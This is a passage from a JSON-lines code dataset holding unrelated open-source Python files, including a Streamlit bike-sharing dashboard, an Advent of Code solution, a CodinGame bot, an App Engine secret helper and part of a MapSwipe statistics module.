{'category_id': 100, 'main_category': 'household'},\n 'household__office_organization': {'category_id': 101, 'main_category': 'household'},\n 'household__outdoor_garden': {'category_id': 98, 'main_category': 'household'},\n 'household__pets': {'category_id': 103, 'main_category': 'household'},\n 'learning__biology': {'category_id': 106, 'main_category': 'learning'},\n 'learning__engineering': {'category_id': 104, 'main_category': 'learning'},\n 'learning__math': {'category_id': 105, 'main_category': 'learning'},\n 'learning__physics_astronomy': {'category_id': 148, 'main_category': 'learning'},\n 'models__animals': {'category_id': 107, 'main_category': 'models'},\n 'models__buildings_structures': {'category_id': 108, 'main_category': 'models'},\n 'models__creatures': {'category_id': 109, 'main_category': 'models'},\n 'models__food_drink': {'category_id': 110, 'main_category': 'models'},\n 'models__furniture': {'category_id': 111, 'main_category': 'models'},\n 'models__robots': {'category_id': 115, 'main_category': 'models'},\n 'models__people': {'category_id': 112, 'main_category': 'models'},\n 'models__props': {'category_id': 114, 'main_category': 'models'},\n 'models__vehicles': {'category_id': 116, 'main_category': 'models'},\n 'tools__hand': {'category_id': 118, 'main_category': 'tools'},\n 'tools__machine': {'category_id': 117, 'main_category': 'tools'},\n 'tools__holders_boxes': {'category_id': 120, 'main_category': 'tools'},\n 'toys__chess': {'category_id': 151, 'main_category': 'toys'},\n 'toys__construction': {'category_id': 121, 'main_category': 'toys'},\n 'toys__dice': {'category_id': 122, 'main_category': 'toys'},\n 'toys__games': {'category_id': 123, 'main_category': 'toys'},\n 'toys__mechanical': {'category_id': 124, 'main_category': 'toys'},\n 'toys__playsets': {'category_id': 113, 'main_category': 'toys'},\n 'toys__puzzles': {'category_id': 125, 'main_category': 'toys'},\n 'toys__accessories': {'category_id': 149, 'main_category': 'toys'}\n}\n\nREQUEST_TIMEOUT = 30\n\nSTANDARDIZE_CONCURRENCY = 30\n\nTRAIN_EPOCHS = len(DATASET_CATEGORIES)\nTRAIN_INPUT_SIZE = 256\nTRAIN_STRATEGY = 'sigmoid' # (relu, sigmoid)\nTRAIN_MODEL_FILE = 'model.h5'\n","repo_name":"AlbertSuarez/3d-net","sub_path":"src/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"33262356930","text":"import os\n\nfrom google.cloud import secretmanager\n\n\ndef access_secret_key_version():\n \"\"\"Access the payload for the given secret version if one exists.\"\"\"\n if not os.getenv(\"GAE_APPLICATION\"):\n return None\n\n project_id = os.getenv(\"GOOGLE_CLOUD_PROJECT\")\n secret_id = os.getenv(\"SECRET_ID\")\n\n # Create the Secret Manager client.\n client = secretmanager.SecretManagerServiceClient()\n\n # Build the resource name of the secret version.\n name = f\"projects/{project_id}/secrets/{secret_id}/versions/latest\"\n\n # Access the secret version.\n response = client.access_secret_version(request={\"name\": name})\n\n # WARNING: Do not print the secret in a production environment - this\n # snippet is showing how to access the secret material.\n return response.payload.data.decode(\"UTF-8\")\n","repo_name":"Xcov19/covidX","sub_path":"covidX/gae_settings.py","file_name":"gae_settings.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"} +{"seq_id":"20351018573","text":"from MLPackage.ML_Functions import functionSampling\r\n\r\ndef FactoryML(filename):\r\n with open(filename, 'r') as f:\r\n name_list = f.readlines()\r\n\r\n result = []\r\n for i in name_list:\r\n # 去除换行符\r\n i = i.strip()\r\n result.append(i)\r\n return result\r\n# 调用\r\n# filename = \"config.txt\"\r\n# model_list = FactoryML(filename)\r\n# for i in model_list:\r\n# functionSampling(i)","repo_name":"wanghan79/2023_Master_Python","sub_path":"2022103261-李德洋/myhomework/homework3/Factory.py","file_name":"Factory.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"30244408267","text":"import numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import *\n\n\ndef mean_absolute_percentage_error(y_true, y_pred):\n return np.mean(np.abs((y_true - y_pred) / y_true)) * 100\n\n\ndef get_metrics(sets_dict):\n metrics_df = pd.DataFrame()\n\n for set_key, tupla in sets_dict.items():\n custom_metrics = {\n 'R2': r2_score(*tupla),\n 'Explained variance': explained_variance_score(*tupla),\n 'Max error': max_error(*tupla),\n 'Mean absolute error': mean_absolute_error(*tupla),\n 'Median absolute error': median_absolute_error(*tupla),\n 'Mean absolute precentage error': \\\n mean_absolute_percentage_error(*tupla),\n 'Mean squared error': mean_squared_error(*tupla),\n 'Root mean squared error': np.sqrt(mean_squared_error(*tupla)),\n }\n\n row_df = pd.Series(custom_metrics).to_frame().T.round(4)\n row_df.rename(columns={0: 'Score'}, inplace=True)\n\n metrics_df = metrics_df.append(row_df)\n\n metrics_df.index = list(sets_dict.keys())\n\n return metrics_df.T\n\n","repo_name":"guillecg/mlops","sub_path":"utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31195207693","text":"from django.urls import path\nfrom .views import (\n BoardCreateAPI, TaskEditAPI, UpdateBoardAPI, TaskCreateAPI, UserRegisterAPI,\n GetBoardDataAPI, ShareBoard, VerifyCode\n)\n\nurlpatterns = [\n path('verify/', VerifyCode.as_view()),\n\n path('register/', UserRegisterAPI.as_view()),\n path('share/', ShareBoard.as_view()),\n path('task/detail//', TaskEditAPI.as_view()),\n path('get/board-data/', GetBoardDataAPI.as_view()),\n path('create-board/', BoardCreateAPI.as_view()),\n path('update-board//', UpdateBoardAPI.as_view()),\n path('create-task/', TaskCreateAPI.as_view())\n]","repo_name":"sardor7414/menegment-system","sub_path":"v1/home/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1815269696","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndataframe = pd.read_csv('day.csv', delimiter=',')\n\n\ndef tenant(dataframe):\n springer = dataframe[dataframe['season'] == 1]\n summer = dataframe[dataframe['season'] == 2]\n fall = dataframe[dataframe['season'] == 3]\n winter = dataframe[dataframe['season'] == 4]\n total_tenant = [springer['cnt'].sum(), summer['cnt'].sum(),\n fall['cnt'].sum(), winter['cnt'].sum()]\n return total_tenant\n\n\ndef trend(dataframe, window_size=30):\n tenant = dataframe['cnt']\n window_size = window_size\n i = 0\n moving_averages = []\n while i < len(tenant) - window_size + 1:\n window_average = round(np.sum(tenant[\n i:i+window_size]) / window_size, 2\n )\n moving_averages.append(window_average)\n i += 1\n return moving_averages\n\n\ndef indice_season(dataframe):\n indices_season = []\n indices_prev_season, prev_season = 0, 1\n for i, season in enumerate(dataframe['season']):\n if season != prev_season:\n indices_season.append([indices_prev_season, i])\n prev_season = season\n indices_prev_season = i+1\n return indices_season\n\n\ndef vis_musim(dataframe):\n total_tenant = tenant(dataframe)\n moving_averages = trend(dataframe, window_size=30)\n indices_season = indice_season(dataframe)\n legend = ['trend', 'Musim Semi', 'Musim Panas',\n 'Musim Gugur', 'Musim Dingin']\n season = ['Musim Semi', 'Musim Panas', 'Musim Gugur', 'Musim Dingin']\n seasonCode = [125, 300, 475, 675]\n\n plt.style.use(\"ggplot\")\n fig, ax = plt.subplots(2, 1, figsize=(20, 14))\n bars = ax[0].bar(seasonCode, total_tenant, width=80,\n color='#A6FF96', alpha=0.5)\n ax[0].set_title(\"Visualisasi jumlah penyewa bergantung pada musim\",\n fontsize=30, fontweight='bold')\n ax[0].set_ylabel(\"Total Jumlah Penyewa\", fontsize=18, fontweight='bold')\n ax[0].set_xticks(seasonCode)\n ax[0].set_xticklabels(season, fontsize=18, fontweight='bold')\n max_index = total_tenant.index(max(total_tenant))\n bars[max_index].set_color('#16FF00')\n\n for bar in bars:\n height = bar.get_height()\n ax[0].annotate(f'{int(height)}',\n xy=(bar.get_x() + bar.get_width() / 2, height-9000),\n xytext=(0, 3),\n textcoords=\"offset points\",\n fontsize=14,\n ha='center', va='bottom')\n\n ax[1].plot(dataframe['instant'][0:len(moving_averages)],\n moving_averages, linewidth=2, color='red')\n ax[1].set_xlabel(\"Recorded day\", fontsize=18, fontweight='bold')\n ax[1].set_ylabel(\"Jumlah Penyewa\", fontsize=18, fontweight='bold')\n\n colors = ['green', '#2B3A55', 'blue', 'yellow']\n c = 0\n for val in indices_season:\n i, j = val\n color = colors[c]\n ax[1].axvspan(i, j, color=color, alpha=0.3)\n if color == \"yellow\":\n c = -1\n c += 1\n plt.legend(legend, loc='upper center', fontsize=15)\n return fig\n\n# create visualization function\n\n\ndef vis(dataframe, filt, data, Code, explode, title):\n pie_result = dataframe.groupby(filt)['cnt'].sum().tolist()\n data = data\n Code = Code\n\n fig, ax = plt.subplots(1, 2, figsize=(\n 20, 14), gridspec_kw={'width_ratios': [2, 3]})\n bars = ax[0].bar(data, pie_result, color='#186F65')\n ax[0].set_xticks(data)\n ax[0].set_xticklabels(Code, fontsize=21, fontweight='bold')\n\n for bar in bars:\n height = bar.get_height()\n ax[0].annotate(f'{int(height)}',\n xy=(bar.get_x() + bar.get_width() / 2, height-9000),\n xytext=(0, 3),\n textcoords=\"offset points\",\n fontsize=20,\n ha='center', va='bottom')\n\n explode = explode\n\n pie_result, texts, autotexts = ax[1].pie(\n pie_result,\n labels=Code,\n autopct='%1.2f%%',\n colors=['#186F65', '#FFA33C'],\n explode=explode,\n startangle=110,\n labeldistance=0.35,\n pctdistance=0.7)\n\n for t in texts:\n t.set_fontsize(20)\n t.set_color('white')\n t.set_fontweight('bold')\n\n for text in autotexts:\n text.set_fontsize(20)\n text.set_color('white')\n text.set_fontweight('bold')\n\n plt.axis('equal')\n\n fig.suptitle(title, fontsize=29, fontweight='bold')\n return fig\n\n\nworkingDay = vis(dataframe,\n 'workingday',\n data=[0, 1],\n Code=['Holiday', 'Workingday'],\n explode=(0, 0.1),\n title='Jumlah Penyewa Sepeda berdasarkan hari kerja'\n )\nweather = vis(dataframe,\n 'weathersit',\n data=[1, 2, 3],\n Code=['Clear', 'Cloudy', 'Light Rain'],\n explode=None,\n title='Jumlah Penyewa Sepada berdasarkan Musim')\n\nst.title('Dicoding Submission - Explore Insight on Bicycle Sharing System')\nst.caption('Nama: Dimas Zuda Fathul Akhir')\nst.caption('Email: dimas.zuda45@gmail.com')\n\ndf, visualize = st.tabs(['DataFrame', 'Visualisasi'])\n\nlist = {'Musim', 'Hari Kerja', 'Cuaca'}\nwith df:\n st.write(\"This is the dataset of the Daily Bike Sharing\")\n st.dataframe(dataframe)\n\nwith visualize:\n option = st.selectbox(\n 'Gain Insight',\n options=list\n )\n if option == 'Musim':\n fig = vis_musim(dataframe)\n st.pyplot(fig)\n elif option == 'Hari Kerja':\n st.pyplot(workingDay)\n else:\n st.pyplot(weather)\n","repo_name":"dimaszuda/Belajar-Data-Science-dengan-Python","sub_path":"dashboard/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"1554982520","text":"import re\nimport numpy as np\n\nwith open('input.txt','r') as f:\n data = f.readlines()\n\npoints = set()\nfolds = []\nfor line in data:\n line = line[:-1]\n if len(line) == 0:\n continue\n if line[0] != 'f':\n pointCoords = line.split(',')\n points.add((int(pointCoords[0]),int(pointCoords[1])))\n else:\n regex = r'fold along (x|y)=([0-9]+)'\n m = re.match(regex,line)\n folds.append((m.group(1),int(m.group(2))))\n\n# =============================================================================\n# PART 1\n# =============================================================================\n\ndef applyFold(points,fold):\n dim,value = fold\n \n newPoints = set()\n if dim == 'x': \n for point in points:\n if point[0] > value:\n newPoints.add((point[0]-2*(point[0]-value),point[1]))\n else:\n newPoints.add((point[0],point[1]))\n else:\n for point in points:\n if point[1] > value:\n newPoints.add((point[0],point[1]-2*(point[1]-value)))\n else:\n newPoints.add((point[0],point[1])) \n \n return newPoints\n \n\n \nnewPoints = applyFold(points,folds[0])\nprint(len(newPoints)) # 708\n\n# =============================================================================\n# PART 2\n# =============================================================================\n\nnewPoints = points\nfor fold in folds:\n newPoints = applyFold(newPoints,fold)\n \nxSize = max(map(lambda x: x[0],newPoints))+1\nySize = max(map(lambda x: x[1],newPoints))+1\n\narray = np.zeros([xSize,ySize],dtype='bool')\n\nfor x,y in newPoints:\n array[x,y] = True\n\nfor j in range(ySize):\n for i in range(xSize):\n print('#' if array[i,j] else '.', end='')\n print('\\n',end='')\n \n# prints EBLUBRFH","repo_name":"GiM6114/Advent-of-Code-2021","sub_path":"Day_13/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20406734043","text":"import sys\nimport random\nfrom operator import attrgetter\n\nfeature_only_2_remaining = False\n\n#weights = [('finish_it', 16), ('planet_bonus_score', 8) , ('score', 4), ('planet.colonization_score', 2) , ('planet_tasks_sum', 1)]\nweights = [('finish_it', 16), ('planet_bonus_score', 8) , ('score', 4), ('planet_tasks_sum', 1)]\n\nbonus_ranking_by_points = {\n \"POINTS_3\": 16,\n \"POINTS_2\": 15, \n \"POINTS_1\": 14,\n \"TECH_RESEARCH_2\": 9,\n \"TECH_RESEARCH_3\": 8,\n \"TECH_RESEARCH_4\": 7,\n \"ENERGY_CORE\": 4,\n \"ALIEN_ARTIFACT\": 0\n}\n\nbonus_ranking_by_tech = {\n \"TECH_RESEARCH_2\": 16,\n \"TECH_RESEARCH_3\": 15,\n \"TECH_RESEARCH_4\": 14,\n \"POINTS_3\": 4,\n \"POINTS_2\": 4, \n \"ENERGY_CORE\": 4,\n \"POINTS_1\": 4,\n \"ALIEN_ARTIFACT\": 4\n}\n\nnumber_of_objectives_reached_before_we_target_point = 1\n\nclass Game:\n def __init__(self):\n self.sector_index = 0\n self.station_objectives = {}\n self.my_stations = []\n self.opp_stations = []\n self.planets = []\n self.my_bonuses = []\n self.opp_bonuses = []\n self.my_colonization_score = 0\n self.opp_colonization_score = 0\n self.reset()\n\n def reset(self):\n self.current_station_index = -1\n self.my_stations.sort(key=attrgetter('remaining_upgrades'))\n\n def tech_first(objectives_reached):\n return (objectives_reached < number_of_objectives_reached_before_we_target_point)\n\n def get_objectives_reached(self):\n count = 0\n for station in self.my_stations:\n reached = True\n for i in range(len(station.tech)):\n if (station.tech[i] < self.get_station_objective_by_id(station.id).tech_objectives[i]):\n reached = False\n if reached:\n count += 1\n return count\n\n def get_station_objective_by_id(self, station_id):\n return self.station_objectives[str(station_id)]\n\n def get_next_active(self):\n if (self.current_station_index+1 < len(self.my_stations)):\n for i in range(self.current_station_index+1, len(self.my_stations)):\n if self.my_stations[i].available:\n self.current_station_index = i\n return self.my_stations[i]\n return None\n\n def get_next_station(self):\n return self.get_next_active()\n\n def get_first_valid_planet(self, station):\n for planet in self.planets:\n if self.should_colonize_planet(planet, station):\n return planet\n return None\n\n def is_planet_not_already_lost(self, planet):\n total_tasks = planet.my_contribution + planet.opp_contribution + planet.tasks_remaining()\n if total_tasks / 2 >= planet.opp_contribution:\n return True\n else:\n return False\n\n def can_use_station_techs_on_planet(self, planet, station):\n for i in range(len(planet.tasks)):\n if planet.tasks[i] > 0 and station.tech[i] > 0:\n return True\n return False\n\n def should_colonize_planet(self, planet, station, go_for_it):\n colonize = self.is_planet_not_already_lost(planet) and self.can_use_station_techs_on_planet(planet, station)\n if colonize and feature_only_2_remaining:\n if len(self.planets) == 2 and (planet.my_contribution + planet.opp_contribution) == 0:\n colonize = False\n if not colonize and go_for_it:\n if planet.my_contribution == 0:\n colonize = True\n return colonize\n\n def get_best_planet(self, station):\n return self.get_first_valid_planet(station)\n\n def get_best_tech_from_station(self, tech_level, station):\n print(\"Station:\", station, file=sys.stderr, flush=True)\n station_objective = self.get_station_objective_by_id(station.id)\n for i in range(len(station.tech)):\n print(\"i:\", i, \"tech_level:\", tech_level, \"current_tech_level:\", station.tech[i], \"station_tech_objective:\", station_objective.tech_objectives[i], file=sys.stderr, flush=True)\n target_level = station.tech[i] + 1\n print(\"bool1:\", (target_level == tech_level), \"bool2:\", (station.tech[i] < station_objective.tech_objectives[i]), file=sys.stderr, flush=True)\n if (target_level == tech_level) and (station.tech[i] < station_objective.tech_objectives[i]):\n print(\"made it\", file=sys.stderr, flush=True)\n return station, i\n return None, None\n\n def get_best_station_from_tech(self, tech_level):\n #if Game.tech_first(self.get_objectives_reached()):\n if False:\n station = self.my_stations[0]\n return self.get_best_tech_from_station(tech_level, station)\n else:\n for station in self.my_stations:\n best_station, i = self.get_best_tech_from_station(tech_level, station)\n if best_station is not None:\n return best_station, i\n return None, None\n\n def get_energy_core_command_line(self):\n if (\"ENERGY_CORE\" in self.my_bonuses):\n return 'ENERGY_CORE'\n return None\n\n def get_tech_research_command_line(self, bonus, tech_level):\n station_id = None\n station, tech_id = self.get_best_station_from_tech(tech_level)\n if station is None or tech_id is None:\n tech_level = 1\n station, tech_id = self.get_best_station_from_tech(tech_level)\n if station is not None:\n if (station.tech[tech_id] > 0):\n return \"TECH_RESEARCH {0} {1}\".format(station.id, tech_id)\n else:\n return \"NEW_TECH {0} {1} {2}\".format(station.id, tech_id, bonus)\n return None\n\n def get_alien_artifact_command_line(self):\n if (\"ALIEN_ARTIFACT\" in self.my_bonuses):\n tech_id_1 = random.randint(0,3)\n tech_id_2 = random.randint(0,3)\n while (tech_id_2 == tech_id_1):\n tech_id_2 = random.randint(0,3)\n return \"ALIEN_ARTIFACT {0} {1}\".format(tech_id_1, tech_id_2)\n return None\n\n def get_best_bonus(self):\n for bonus in self.my_bonuses:\n if bonus not in [\"POINTS_1\", \"POINTS_2\", \"POINTS_3\", \"ENERGY_CORE\"]:\n return bonus\n return None\n\n def get_bonus_command_line(self, objectives_reached):\n print(\"get_bonus_command_line, obj:\", objectives_reached, \"len bonuses:\", len(self.my_bonuses), file=sys.stderr, flush=True)\n if (Game.tech_first(objectives_reached) and len(self.my_bonuses) > 0):\n # If TECH bonus: apply based on objective to TECH_RESEARCH\n # If not TECH bonus: apply based on objective to NEW_TECH\n for bonus in self.my_bonuses:\n if \"TECH_RESEARCH\" in bonus:\n command = self.get_tech_research_command_line(bonus, int(bonus[-1]))\n else:\n command = self.get_tech_research_command_line(bonus, 1)\n if command is not None:\n return command\n else:\n bonus = self.get_best_bonus()\n if bonus == \"TECH_RESEARCH_2\":\n return self.get_tech_research_command_line(bonus, 2)\n elif bonus == \"TECH_RESEARCH_3\":\n return self.get_tech_research_command_line(bonus, 3)\n elif bonus == \"TECH_RESEARCH_4\":\n return self.get_tech_research_command_line(bonus, 4)\n elif bonus == \"ALIEN_ARTIFACT\":\n return self.get_tech_research_command_line(bonus, 1)\n return None\n\n def get_best_preferred_bonus(self, planet, objectives_reached):\n if (not Game.tech_first(objectives_reached)):\n if bonus_ranking_by_points[planet.bonuses[0]] > bonus_ranking_by_points[planet.bonuses[1]]:\n return 0\n else:\n return 1\n else:\n if bonus_ranking_by_tech[planet.bonuses[0]] > bonus_ranking_by_tech[planet.bonuses[1]]:\n return 0\n else:\n return 1\n\n\n def get_action(self):\n # main actions: COLONIZE | RESUPPLY\n # bonus actions: ENERGY_CORE | ALIEN_ARTIFACT | TECH_RESEARCH | NEW_TECH\n\n bonus_command_line = self.get_bonus_command_line(self.get_objectives_reached())\n if bonus_command_line is not None:\n return bonus_command_line\n else:\n combos = []\n for station in self.my_stations:\n if station.available:\n for planet in self.planets:\n combos.append(Combo(station, planet, self.get_objectives_reached()))\n combos.sort(key=attrgetter('finish_it', 'planet_bonus_score', 'score', 'planet.colonization_score', 'planet_tasks_sum'), reverse=True)\n\n for combo in combos:\n if self.should_colonize_planet(combo.planet, combo.station, go_for_it=False):\n bonus = self.get_best_preferred_bonus(combo.planet, self.get_objectives_reached())\n return \"COLONIZE {0} {1} {2}\".format(combo.station.id, combo.planet.id, bonus)\n\n #for combo in combos:\n # if self.should_colonize_planet(combo.planet, combo.station, go_for_it=True):\n # bonus = self.get_best_preferred_bonus(combo.planet, self.get_objectives_reached())\n # return \"COLONIZE {0} {1} {2}\".format(combo.station.id, combo.planet.id, bonus)\n\n energy_core_command_line = self.get_energy_core_command_line()\n if energy_core_command_line is not None:\n return energy_core_command_line\n return 'RESUPPLY'\n\nclass StationObjective:\n def __init__(self, id, mine, objective_score, tech_objectives):\n self.id = id\n self.mine = mine\n self.objective_score = objective_score\n self.tech_objectives = tech_objectives\n\nclass Station:\n def __init__(self, id, mine, available, tech, objective_score, tech_objectives):\n self.id = id\n self.mine = mine\n self.available = available\n self.tech = tech\n self.tech_objectives = tech_objectives\n self.objective_score = objective_score\n self.remaining_upgrades = 0\n self.set_remaining_upgrades()\n\n def set_remaining_upgrades(self):\n for i in range(len(self.tech)):\n self.remaining_upgrades += (self.tech_objectives[i] - self.tech[i])\n\nclass Planet:\n def __init__(self, planet_id, tasks, my_contribution, opp_contribution, colonization_score, bonuses):\n self.id = planet_id\n self.tasks = tasks\n self.my_contribution = my_contribution\n self.opp_contribution = opp_contribution\n self.colonization_score = colonization_score\n self.bonuses = bonuses\n \n def tasks_remaining(self):\n return self.tasks[0] + self.tasks[1] + self.tasks[2] + self.tasks[3]\n\n def bonus_score(self, objectives_reached):\n if (not Game.tech_first(objectives_reached)):\n if bonus_ranking_by_points[self.bonuses[0]] > bonus_ranking_by_points[self.bonuses[1]]:\n return bonus_ranking_by_points[self.bonuses[0]]\n else:\n return bonus_ranking_by_points[self.bonuses[1]]\n else:\n if bonus_ranking_by_tech[self.bonuses[0]] > bonus_ranking_by_tech[self.bonuses[1]]:\n return bonus_ranking_by_tech[self.bonuses[0]]\n else:\n return bonus_ranking_by_tech[self.bonuses[1]]\n\nclass Combo:\n def __init__(self, station, planet, objectives_reached):\n self.id = id\n self.station = station\n self.planet = planet\n self.score = 0\n self.set_score()\n self.planet_tasks_sum = 16 - self.planet.tasks_remaining()\n self.planet_bonus_score = self.planet.bonus_score(objectives_reached)\n self.finish_it = 0\n self.set_finish_it()\n self.weighted_score = 0\n self.set_weighted_score()\n\n def set_score(self):\n self.score = 0\n for i in range(4):\n self.score += min(self.planet.tasks[i], self.station.tech[i])\n \n def set_finish_it(self):\n self.finish_it = 0\n can_finish = True\n for i in range(4):\n if (self.planet.tasks[i] > self.station.tech[i]):\n can_finish = False\n if can_finish and self.planet.opp_contribution == 0:\n self.finish_it = 16\n \n def set_weighted_score(self):\n score = 0\n for attribute, weight in weights:\n score += self.__getattribute__(attribute) * weight\n self.weighted_score = score\n\n\ngame = Game()\n\nfor i in range(8):\n # objective_score: receive these points if tech level objectives are met\n station_id, mine, objective_score, obj_0, obj_1, obj_2, obj_3 = [int(j) for j in input().split()]\n station_objective = StationObjective(station_id, mine, objective_score, [obj_0, obj_1, obj_2, obj_3])\n game.station_objectives[str(station_id)] = station_objective\n\n# game loop\nwhile True:\n sector_index = int(input())\n game.sector_index = sector_index\n\n game.my_stations = []\n game.opp_stations = []\n for i in range(8):\n station_id, mine, available, tech_0, tech_1, tech_2, tech_3 = [int(j) for j in input().split()]\n station_objective = game.get_station_objective_by_id(station_id)\n station = Station(station_id, mine, available, [tech_0, tech_1, tech_2, tech_3],\n station_objective.objective_score, station_objective.tech_objectives)\n if mine:\n game.my_stations.append(station)\n else:\n game.opp_stations.append(station)\n \n game.planets = []\n planet_count = int(input())\n for i in range(planet_count):\n inputs = input().split()\n planet_id = int(inputs[0])\n tasks_0 = int(inputs[1])\n tasks_1 = int(inputs[2])\n tasks_2 = int(inputs[3])\n tasks_3 = int(inputs[4])\n my_contribution = int(inputs[5]) # the amount of tasks you have already completed\n opp_contribution = int(inputs[6])\n colonization_score = int(inputs[7]) # points awarded to the colonizer having completed the most tasks\n bonus_0 = inputs[8]\n bonus_1 = inputs[9]\n planet = Planet(planet_id, [tasks_0, tasks_1, tasks_2, tasks_3], my_contribution, opp_contribution, colonization_score, [bonus_0, bonus_1])\n game.planets.append(planet)\n\n bonus_count = int(input()) # bonuses in both you and your opponent's inventories\n game.my_bonuses = []\n game.opp_bonuses = []\n for i in range(bonus_count):\n inputs = input().split()\n mine = int(inputs[0])\n bonus = inputs[1]\n if mine:\n game.my_bonuses.append(bonus)\n else:\n game.opp_bonuses.append(bonus)\n game.my_colonization_score = int(input()) # points from planet colonization, does not include bonus points\n game.opp_colonization_score = int(input())\n\n game.reset()\n\n action = game.get_action()\n # Write an action using print\n # To debug: print(\"Debug messages...\", file=sys.stderr, flush=True)\n print(action)\n","repo_name":"rkazma14/codinggame2k1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39427352726","text":"# List and tuple These are the container in python to stores the data in the string , int , float or boolen\n\n# List\n\n# Initialize list \nMy_List_1 = [1,5,3,4,2]\n\n# print(My_List_1)\n\n# This code genrally pring the items inside the list container\n\n# List indexing\n\n'''\nA list can be index by how the string get index\n\n1. [0:] - Here the items get print from 0th index to the len of the list\n\n2. [0::2] - Here the items get print from the 0th index to the len of the list keeping \na 2 index of gap\n\n! both Methods shown below\n'''\n\n# 1. \n\n# print(My_List_1[0:])\n\n# another \n\n# print(My_List_1[:2])\n\n# 2.\n\n# print(My_List_1[0::3]) \n\n\n# Function in the List\n\n# My_List_1.sort() #Sort the list or arrange the list items form assending to desending order\n\n# My_List_1.reverse() #Reverse function reverse all the items in the string\n\nappending_object = 72\n\n# My_List_1.append(appending_object) # Append or add an object inside the list\n\nMy_List_1.insert(3, appending_object)\n\n# Deleting function pop and remove\n\n'''\n.pop remove the element from the index of the list\n\n.remove remove the element value given in the parameter\n'''\n\n# print(My_List_1)\n\n\n\n'''\nTuple\n\nTuple is a data type in which you can store data and is immutable\n\nTuple is the fastest arrey in python\n\nInitializeing tuple is like these: - ()\n\n'''\n\nMy_Tuple = (1,2,3,4,5,6,6,5,4,3,2,1)\n\n# print(My_Tuple)\n\n\nprint(My_Tuple.index(5))\n\n'''\nIf you try to change the tuple you will get TypeError: \n\n'tuple' object does not support item assignment\n\nhere item assignment is changing\n\nHere the count function give the number of repeated object in tuple or list\n\nHere the index function give the given number index in the Data type\n'''\n\n","repo_name":"sumit123123/Python","sub_path":"Chapter 4/Index.py","file_name":"Index.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"10241651752","text":"import os\n\nimport pandas as pd\n\nfrom mapswipe_workers import auth\nfrom mapswipe_workers.definitions import logger\nfrom mapswipe_workers.utils import geojson_functions\n\n\ndef get_overall_stats(projects_df: pd.DataFrame, filename: str) -> pd.DataFrame:\n \"\"\"\n The function aggregates the statistics per project using the status attribute.\n We derive aggregated statistics for active, inactive and finished projects.\n The number of users should not be summed up here, since this would generate wrong\n results.\n A single user can contribute to multiple projects, we need to consider this.\n\n Parameters\n ----------\n projects_df: pd.DataFrame\n filename: str\n \"\"\"\n projects_df[\"number_of_users\"].fillna(0, inplace=True)\n overall_stats_df = projects_df.groupby([\"status\"]).agg(\n count_projects=pd.NamedAgg(column=\"project_id\", aggfunc=\"count\"),\n area_sqkm=pd.NamedAgg(column=\"area_sqkm\", aggfunc=\"sum\"),\n number_of_results=pd.NamedAgg(column=\"number_of_results\", aggfunc=\"sum\"),\n number_of_results_progress=pd.NamedAgg(\n column=\"number_of_results_progress\", aggfunc=\"sum\"\n ),\n average_number_of_users_per_project=pd.NamedAgg(\n column=\"number_of_users\", aggfunc=\"mean\"\n ),\n )\n\n overall_stats_df.to_csv(filename, index_label=\"status\")\n logger.info(f\"saved overall stats to {filename}\")\n\n return overall_stats_df\n\n\ndef get_project_static_info(filename: str) -> pd.DataFrame:\n \"\"\"\n The function queries the projects table.\n Each row represents a single project and provides the information which is static.\n By static we understand all attributes which are not affected by new results being\n contributed.\n The results are stored in a csv file and also returned as a pandas DataFrame.\n\n Parameters\n ----------\n filename: str\n \"\"\"\n\n pg_db = auth.postgresDB()\n\n # make sure to replace newline characters here\n sql_query = \"\"\"\n COPY (\n SELECT\n project_id\n ,regexp_replace(name, E'[\\\\n\\\\r]+', ' ', 'g' ) as name\n ,regexp_replace(project_details, E'[\\\\n\\\\r]+', ' ', 'g' ) as\n project_details\n ,regexp_replace(look_for, E'[\\\\n\\\\r]+', ' ', 'g' ) as look_for\n ,project_type\n ,image\n ,created\n -- Custom options values\n ,CASE\n WHEN (\n project_type_specifics->'customOptions' IS NOT NULL AND\n (project_type_specifics->'customOptions')::TEXT != 'null'::TEXT\n )\n THEN -- thus if we have answer labels use them\n (project_type_specifics->'customOptions')::TEXT\n ELSE -- otherwise use below label range as the mapswipe app default\n '[{\"value\": 0}, {\"value\": 1}, {\"value\": 2}, {\"value\": 3}]'::TEXT\n END as custom_options\n -- add an array of the tile server names\n ,CASE\n WHEN project_type_specifics->'tileServer'->'name' IS NOT NULL THEN\n Array[project_type_specifics->'tileServer'->>'name']\n ELSE Array[project_type_specifics->'tileServerA'->>'name',\n project_type_specifics->'tileServerB'->>'name']\n END as tile_server_names\n ,regexp_replace(status, E'[\\\\n\\\\r]+', ' ', 'g' ) as status\n ,ST_Area(geom::geography)/1000000 as area_sqkm\n ,ST_AsText(geom) as geom\n ,ST_AsText(ST_Centroid(geom)) as centroid\n FROM projects\n ) TO STDOUT WITH CSV HEADER\"\"\"\n\n with open(filename, \"w\") as f:\n pg_db.copy_expert(sql_query, f)\n\n del pg_db\n logger.info(\"got projects from postgres.\")\n\n df = pd.read_csv(filename)\n\n return df\n\n\ndef 